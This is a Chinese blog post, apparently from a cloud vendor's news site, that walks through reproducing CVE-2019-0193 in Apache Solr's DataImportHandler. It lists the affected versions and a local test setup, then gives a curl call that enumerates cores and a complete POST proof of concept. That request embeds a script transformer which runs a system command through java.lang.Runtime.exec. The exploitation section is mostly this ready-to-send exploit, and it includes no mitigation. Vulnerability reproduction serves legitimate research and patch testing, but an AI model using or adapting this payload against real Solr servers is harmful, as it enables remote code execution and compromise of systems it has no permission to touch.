温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析

发布时间:2021-12-10 15:38:06 来源:亿速云 阅读:243 作者:柒染 栏目:大数据

今天就跟大家聊聊有关Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

0x01 影响范围


Apache Solr < 8.2.0

0x02 环境搭建


下载地址:

https://www.apache.org/dyn/closer.lua/lucene/solr/7.7.2/solr-7.7.2.zip

在本地解压,进入solr-7.7.2目录,执行命令

bin/solr -e dih (前提:java环境)

Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析

然后访问http://localhost:8983/solr即可访问环境

0x03 漏洞利用


首先我们可以通过接口

curl http://127.0.0.1:8983/solr/admin/cores

来获取所有 core 信息,下面我们构造 payload 需要 name 信息

Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析

在Burp中发送以下POC即可执行命令弹出计算器,下面的<your_core_name> 需要替换为你获取到的 core 的 name(共两处)

POST /solr/<your_core_name>/dataimport HTTP/1.1Host: 127.0.0.1:8983Content-Length: 763User-Agent: Mozilla/5.0Content-type: application/x-www-form-urlencodedConnection: close
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(row){var process= java.lang.Runtime.getRuntime();process.exec("calc");return row;}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document></dataConfig>
执行效果如下:

Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析

看完上述内容,你们对Apache Solr远程命令执行CVE-2019-0193漏洞复现的示例分析有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI